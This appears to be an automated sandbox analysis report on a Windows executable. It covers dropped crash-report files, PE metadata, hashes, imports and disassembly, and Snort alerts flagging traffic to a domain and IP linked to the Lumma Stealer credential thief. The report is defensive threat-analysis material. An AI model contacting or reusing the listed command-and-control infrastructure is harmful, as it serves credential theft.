Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.7.6.6.4.8.9.4.6.2.0.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.7.6.6.4.9.3.8.3.7.1.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.a.e.d.a.3.a.-.c.1.8.7.-.4.4.7.4.-.9.1.9.4.-.c.2.8.c.6.a.8.3.a.d.d.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.3.8.6.5.c.4.-.d.b.8.3.-.4.9.4.2.-.a.4.6.9.-.7.5.8.7.c.c.d.f.a.5.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.o.G.t.e.l.k.H.S.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.4.-.0.0.0.1.-.0.0.1.4.-.b.8.8.0.-.a.d.f.6.8.b.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.2.7.5.f.6.f.c.e.f.e.7.1.0.7.6.6.6.0.7.4.e.4.c.9.9.b.9.7.6.e.0.0.0.0.f.f.f.f.!.0.0.0.0.3.2.5.0.9.2.e.2.1.e.3.0.8.9.9.7.9.7.5.6.b.e.1.9.0.4.7.c.4.4.b.c.4.d.0.3.6.d.c.6.!.V.o.G.t.e.l.k.H.S.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER43F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Apr 26 03:44:09 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	51510
Entropy (8bit):	2.6590032344629932
Encrypted:	false
SSDEEP:	192:eUXKMaHW9y1UKkOzBF1L2jjOFPu52U+0el1lwOXjlsxvqVmawSnQDOsU:wW9aUozBF1ujOrT061SxiUavaOt
MD5:	7717D53B95EAE50DABA784ED32B00C95
SHA1:	61312DE246042A94E06FC9D5CA2FDC00F138240B
SHA-256:	B4A06B54226AB2211394B6CCE010A3CF803FE9AE7EFE84A3124B18530B1F0902
SHA-512:	FA9FA0002F235799A3BE160638C0EDAFFF7AE76BEF071BB1217F9FA660DF3F7B5EC176C5A33E496590C593CD10E8B7C463AFA5423021D044A44645EA14611A8F
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........#+f............4...............H........................1..........`.......8...........T...........h>.............x ..........d"..............................................................................eJ......."......GenuineIntel............T.......D...."+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8418
Entropy (8bit):	3.6933921698117222
Encrypted:	false
SSDEEP:	192:R6l7wVeJVm646YEIxSU9gAgmf0JmnprD89b8dsfS0m:R6lXJk646YE+SU9gAgmf0JmO8WfA
MD5:	F16111425CE937370526EA573700C098
SHA1:	743D5F01420B80C08D76823B7A99173F4EBA3445
SHA-256:	5C592973511E455D38AAFF2C4BDCF83BD45A539DCDBBD304AE6F9E4395CBD2D7
SHA-512:	4CC4D9FBAB2D45E8486FB5BC3937D2317D3170C7307925157E2EB04E325A8F9E78494FD83213E8D06D3BD0484CF04FA6B234F6E283922539280DCC99E4E64079
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER56A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4686
Entropy (8bit):	4.45171786614404
Encrypted:	false
SSDEEP:	48:cvIwWl8zsgJg77aI9Ej/WpW8VYNYm8M4J1g/g/V6FZH+q8vig/Vr7gt0Egtkd:uIjfmI7iu7V9J1QU8HKiUr720E2kd
MD5:	0935857C49968C5292CD450075F11520
SHA1:	0B722BA984576D92636218AE726EA721B0C977D0
SHA-256:	C4308C9C40A54039FCCFB4A17BA864E6B81247FBF769158DA71B040608009E5D
SHA-512:	72EB89AD83606AC03882BEE5373EE5CB33EBE73BC5BAC0F956B494500A6674D7ADB12244E4CEF4F6BD47752F850A7D336FA8E356CA800838294CD8B7411D373A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296326" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421574982233092
Encrypted:	false
SSDEEP:	6144:OSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:tvloTMW+EZMM6DFyE03w
MD5:	40255993A9FE77FD67F158EC1A5954AD
SHA1:	9C6C08BD7B3C1248096DF284F93528D66E61EA31
SHA-256:	4836037D7979DACD103D486B6BCC7ADF28302BB85709934253143515E3862B9F
SHA-512:	676AE9B0A3BEEBCA7F6DC3C641DADF3D29355DF84CEB19FBE03394BC046768185423615968E91A1D2166A1C79D039DAB78A4BEE3C68912623EB3A5AAD694E916
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.491780087323678
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	VoGtelkHSn.exe
File size:	351'232 bytes
MD5:	7f26737f63fcd5b7e2695f438e341075
SHA1:	325092e21e3089979756be19047c44bc4d036dc6
SHA256:	ba7b9fc2750021800299ae2473acdcc6f5bf93e391bebe5da3cd7959904980ff
SHA512:	8e169fdebec064a2a4cdda391dbb189f460e4e931597892ce2c44178cc93ea3a0f38d49761a770a5454cef6a1b626e99b4fbc89ad9f9a722af21320965d87a48
SSDEEP:	6144:yYqGf1ePFElQITCi9mqJeioCyRcjm8GRSpEfJnusH10i:yY3+FEl6QboCGcK3txFV
TLSH:	8474F021B6A1F032D467D8740A38C7E05F7F7DB22BB490477394267E1EB26D19A26723
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#/4.gNZ.gNZ.gNZ.y...vNZ.y....NZ.y...KNZ.@.!.bNZ.gN[..NZ.y...fNZ.y...fNZ.y...fNZ.RichgNZ.................PE..L...S.bc...........

File Icon


Icon Hash:	67276767c3571667

Static PE Info

General

Entrypoint:	0x401872
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6362D753 [Wed Nov 2 20:47:15 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ecaec964738e0d632998678ce4e20365

Entrypoint Preview

Instruction
call 00007FC21483BE47h
jmp 00007FC21483659Dh
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FC214836746h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FC214836770h
test ecx, 00000003h
jne 00007FC214836711h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007FC21483670Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007FC214836754h
test ah, ah
je 00007FC214836746h
test eax, 00FF0000h
je 00007FC214836735h
test eax, FF000000h
je 00007FC214836724h
jmp 00007FC2148366EFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040E1ECh
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FC21483672Eh
test byte ptr [eax], 00000008h
je 00007FC214836729h

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4ce9c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x270c000	0x70a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x170	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc253	0xc400	42af5d93e5de7f8a55c75634750a7537	False	0.6040935905612245	data	6.532660619634673	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x3f6e8	0x3f800	d20e7bf0ffb86ede75b94e96b83dcaa3	False	0.7010065514271654	data	6.528847670085214	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4e000	0x26bd448	0x2a00	085860a21bd1c3f20e0080516c22fd1a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x270c000	0x70a8	0x7200	541c61aa88f1e9635dd9d264fdac7aa7	False	0.5160704495614035	data	5.167904163827637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x2711bc8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_ICON	0x270c420	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.43150319829424305
RT_ICON	0x270d2c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5672382671480144
RT_ICON	0x270db70	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6261520737327189
RT_ICON	0x270e238	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6784682080924855
RT_ICON	0x270e7a0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.5152489626556016
RT_ICON	0x2710d48	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5864754098360656
RT_ICON	0x27116d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.6152482269503546
RT_STRING	0x2711ef0	0xa2	data			0.5864197530864198
RT_STRING	0x2711f98	0x662	data			0.4339045287637699
RT_STRING	0x2712600	0x1ce	data			0.474025974025974
RT_STRING	0x27127d0	0x694	data			0.42636579572446553
RT_STRING	0x2712e68	0x16c	data			0.5137362637362637
RT_STRING	0x2712fd8	0xcc	data			0.5637254901960784
RT_ACCELERATOR	0x2711ba0	0x28	data			1.0
RT_GROUP_CURSOR	0x2711cf8	0x14	data			1.15
RT_GROUP_ICON	0x2711b38	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x2711d10	0x1e0	data			0.575

Imports

DLL

Import

KERNEL32.dll

GetModuleHandleW, GetProcessHeap, GetDateFormatA, SetCommState, GlobalAlloc, GetVolumeInformationA, IsBadCodePtr, HeapDestroy, GetModuleFileNameW, SetConsoleTitleA, GlobalUnfix, EnumCalendarInfoW, GetProcAddress, SetFirmwareEnvironmentVariableW, LoadLibraryA, GetFileType, SetConsoleDisplayMode, FreeEnvironmentStringsW, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, FindAtomW, FileTimeToLocalFileTime, SetFileAttributesW, SetCurrentDirectoryA, GetLocaleInfoA, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, InitializeCriticalSectionAndSpinCount, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, ReadFile, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA

ADVAPI32.dll

ReadEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/26/24-05:44:01.105350	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49706	443	192.168.2.5	172.67.163.209
04/26/24-05:44:03.319178	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49708	443	192.168.2.5	172.67.163.209
04/26/24-05:43:59.940120	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49705	443	192.168.2.5	172.67.163.209
04/26/24-05:44:05.638317	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49710	443	192.168.2.5	172.67.163.209
04/26/24-05:43:58.725101	UDP	2052229	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop)	57412	53	192.168.2.5	1.1.1.1
04/26/24-05:44:04.568308	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49709	443	192.168.2.5	172.67.163.209
04/26/24-05:43:58.891180	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49704	443	192.168.2.5	172.67.163.209
04/26/24-05:44:07.287198	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49711	443	192.168.2.5	172.67.163.209
04/26/24-05:44:02.110134	TCP	2052230	ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI)	49707	443	192.168.2.5	172.67.163.209

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 05:43:58.889981985 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:58.890038013 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:58.890126944 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:58.891180038 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:58.891199112 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.207051039 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.207191944 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.216829062 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.216849089 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.217192888 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.263021946 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.264970064 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.264992952 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.265080929 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.931391001 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.931526899 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.931588888 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.933892965 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.933914900 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.933932066 CEST	49704	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.933938026 CEST	443	49704	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.939722061 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.939765930 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:43:59.939831018 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.940119982 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:43:59.940136909 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.255330086 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.255424023 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.256745100 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.256766081 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.257170916 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.258244991 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.258299112 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.258346081 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.955645084 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.955864906 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.955944061 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.955967903 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.955997944 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.956053019 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.956087112 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.956254959 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.956311941 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.956338882 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.956517935 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.956573009 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.956588030 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957062006 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957120895 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.957134008 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957252979 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957314014 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.957326889 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957448006 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957515001 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.957590103 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.957590103 CEST	49705	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:00.957623005 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:00.957643986 CEST	443	49705	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.104851007 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.104896069 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.104981899 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.105350018 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.105365992 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.417582035 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.417789936 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.419116020 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.419123888 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.419447899 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.420758963 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.420916080 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.420962095 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.951178074 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.951455116 CEST	443	49706	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:01.951508999 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:01.951554060 CEST	49706	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.109661102 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.109688044 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.109772921 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.110133886 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.110147953 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.418365002 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.418454885 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.420334101 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.420341969 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.420672894 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.422275066 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.422369003 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.422418118 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:02.422483921 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:02.422496080 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.124844074 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.124954939 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.125013113 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.125149965 CEST	49707	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.125169992 CEST	443	49707	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.318712950 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.318744898 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.318948984 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.319178104 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.319191933 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.628565073 CEST	443	49708	172.67.163.209	192.168.2.5
Apr 26, 2024 05:44:03.628669977 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.629968882 CEST	49708	443	192.168.2.5	172.67.163.209
Apr 26, 2024 05:44:03.629976988 CEST	443	49708	172.67.163.209	192.168.2.5
